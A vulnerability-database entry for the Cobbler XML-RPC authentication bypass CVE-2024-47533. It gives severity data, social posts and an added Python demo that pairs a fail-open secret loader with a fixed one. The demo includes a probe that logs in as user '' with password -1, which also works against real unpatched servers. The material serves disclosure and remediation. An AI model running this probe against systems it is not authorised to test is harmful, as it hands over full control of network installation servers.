CVE-2024-47533

Published Nov 18, 2024

Last updated 3 months ago

Overview

Description
Cobbler, a Linux installation server that allows for rapid setup of network installation environments, has an improper authentication vulnerability (CWE-287) affecting versions from 3.0.0 up to, but not including, 3.2.3 and 3.3.7. `utils.get_shared_secret()` always returns `-1` instead of the configured shared secret, so anyone who can reach the Cobbler XML-RPC endpoint can log in as user `''` with password `-1` and make any change the API allows. This gives anyone with network access to a Cobbler server full control of it, with no credentials, user interaction or prior access required, which is what the CVSS vector below reflects. Versions 3.2.3 and 3.3.7 fix the issue; until they are deployed, restricting network access to the XML-RPC endpoint is the practical interim mitigation, since the bypass does not depend on what the configured secret is.
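The authentication shortcut described above, modelled as an added example (this is not Cobbler's own code). It pairs a shared-secret loader that fails open with one that fails closed, puts each behind a loopback XML-RPC stand-in for Cobbler's login() method, and probes both with user '' and password -1. Assumptions, marked in the code: the secret file path /var/lib/cobbler/web.ss, the simplified login() model, and that the always-returns-minus-one behaviour comes from an open() call that mixes binary mode with an encoding argument.

```python
"""CVE-2024-47533 modelled end to end: a shared-secret loader that fails open,
a hardened one that fails closed, and a loopback XML-RPC probe for the bypass.
Added example, not Cobbler's code; assumptions are marked where they apply."""
import os
import secrets
import tempfile
import threading
import xmlrpc.client
from xmlrpc.server import SimpleXMLRPCServer

# Assumption: Cobbler keeps the shared secret used by the CLI/web UI in this
# file. The path is only a default; the demo below passes a temporary file.
WEB_SS = "/var/lib/cobbler/web.ss"


def get_shared_secret_vulnerable(path=WEB_SS):
    """Fails open: open() with 'rb' plus an encoding always raises ValueError,
    the broad except swallows it, and the caller receives -1, which then
    becomes a valid password. The advisory only states that -1 is always
    returned; blaming this exact open() call is an assumption."""
    try:
        with open(path, "rb", encoding="utf-8") as fd:
            data = fd.read()
    except Exception:
        return -1
    return str(data).strip()


def get_shared_secret_fixed(path=WEB_SS):
    """Fails closed: if the secret cannot be read, return None so that no
    password can ever compare equal to it."""
    try:
        with open(path, "r", encoding="utf-8") as fd:
            data = fd.read().strip()
    except OSError:
        return None
    return data or None


class CobblerLikeApi:
    """Stand-in for the shared-secret branch of Cobbler's XML-RPC login().
    Assumption: an empty username selects shared-secret authentication and
    the password is compared directly with whatever the loader returned."""

    def __init__(self, shared_secret):
        self.shared_secret = shared_secret
        self.tokens = {}

    def login(self, login_user, login_password):
        if (login_user == "" and self.shared_secret is not None
                and login_password == self.shared_secret):
            token = secrets.token_hex(16)
            self.tokens[token] = "<DIRECT>"
            return token
        raise ValueError("login failed")  # delivered to the client as a Fault


def serve(api):
    """Expose `api` on a loopback XML-RPC server running in a daemon thread."""
    server = SimpleXMLRPCServer(("127.0.0.1", 0), logRequests=False)
    server.register_instance(api)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    host, port = server.server_address
    return server, f"http://{host}:{port}/"


def try_login(url, user, password):
    """Return a session token on success, None when the server rejects."""
    try:
        token = xmlrpc.client.ServerProxy(url).login(user, password)
    except xmlrpc.client.Fault:
        return None
    return token if isinstance(token, str) and token else None


def probe_shared_secret_bypass(url):
    """True if login('', -1) or login('', '-1') yields a token. Both forms are
    tried because which one matches depends on the server's comparison type."""
    return any(try_login(url, "", pw) is not None for pw in (-1, "-1"))


def demo():
    """Probe both loaders against a populated secret file (constructed here)."""
    with tempfile.NamedTemporaryFile("w", suffix=".ss", delete=False) as fd:
        real_secret = secrets.token_hex(32)
        fd.write(real_secret + "\n")
        ss_path = fd.name
    results = {}
    try:
        for name, loader in (("vulnerable", get_shared_secret_vulnerable),
                             ("fixed", get_shared_secret_fixed)):
            server, url = serve(CobblerLikeApi(loader(ss_path)))
            results[name] = {
                "bypass_with_minus_one": probe_shared_secret_bypass(url),
                "real_secret_works": try_login(url, "", real_secret) is not None,
            }
            server.shutdown()
            server.server_close()
    finally:
        os.unlink(ss_path)
    return results


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name:10s} {outcome}")
```

Run stand-alone, the vulnerable server accepts password -1 and rejects the real secret (the file is never used), while the fixed server does the opposite. Point probe_shared_secret_bypass() at a real endpoint only where you are authorised; a returned token is the bypass in action, and the remedy is the upgrade to 3.2.3 or 3.3.7 rather than rotating the secret, because on affected versions the loaded value is -1 regardless of what the file contains.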
Source
security-advisories@github.com
NVD status
Awaiting Analysis

Risk scores

CVSS 3.1

Type
Secondary
Base score
9.8
Impact score
5.9
Exploitability score
3.9
Vector string
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Severity
CRITICAL

Weaknesses

security-advisories@github.com
CWE-287

Social media

Hype score
Not currently trending
  1. 🚨 A Critical Vulnerability Exists In Cobbler Server (CVE-2024-47533). See the @ncsc_gov_ie advisory for more info: https://t.co/TtCNPR2QPI

    @ncsc_gov_ie

    22 Nov 2024

    207 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  2. 🚨 Security Alert: A critical authentication vulnerability (CVE-2024-47533) in Cobbler allows attackers to bypass authentication and gain full control of the server. Update to versions 3.2.3 or 3.3.7 immediately to secure your system! #Cybersecurity #Ostorlab #Vulnerabilities…

    @OstorlabSec

    21 Nov 2024

    59 Impressions

    2 Retweets

    2 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  3. Critical: Improper authentication in #Cobbler server. CVE-2024-47533 CVSS: 9.8. Vulnerable prior to versions 3.2.3 and 3.3.7, allowing unauthenticated access and full server control. https://t.co/hwTHNIQR9d #Patch #Patch #Patch

    @CCBalert

    21 Nov 2024

    76 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  4. CVE-2024-47533 (CVSS 9.8): Cobbler Vulnerability Exposes Linux Servers to Compromise https://t.co/kAnmJQnhtU

    @Dinosn

    20 Nov 2024

    1959 Impressions

    7 Retweets

    18 Likes

    1 Bookmark

    0 Replies

    0 Quotes

  5. Cobbler Vulnerability Exposes #Linux Servers to Compromise CVE-2024-47533 (CVSS 9.8) exposes #Cobbler servers to unauthorized access and control, enabling attackers to manipulate system configurations. https://t.co/IBqG2gmwUF

    @the_yellow_fall

    20 Nov 2024

    17 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  6. CVE-2024-47533 Improper Authentication in Cobbler XML-RPC Allows Full Server Control Cobbler is a tool for setting up Linux installations quickly. From version 3.0.0 to before versions 3.2.3 and 3.3.7, it has a p... https://t.co/sb4R5gwB6S

    @VulmonFeeds

    18 Nov 2024

    39 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes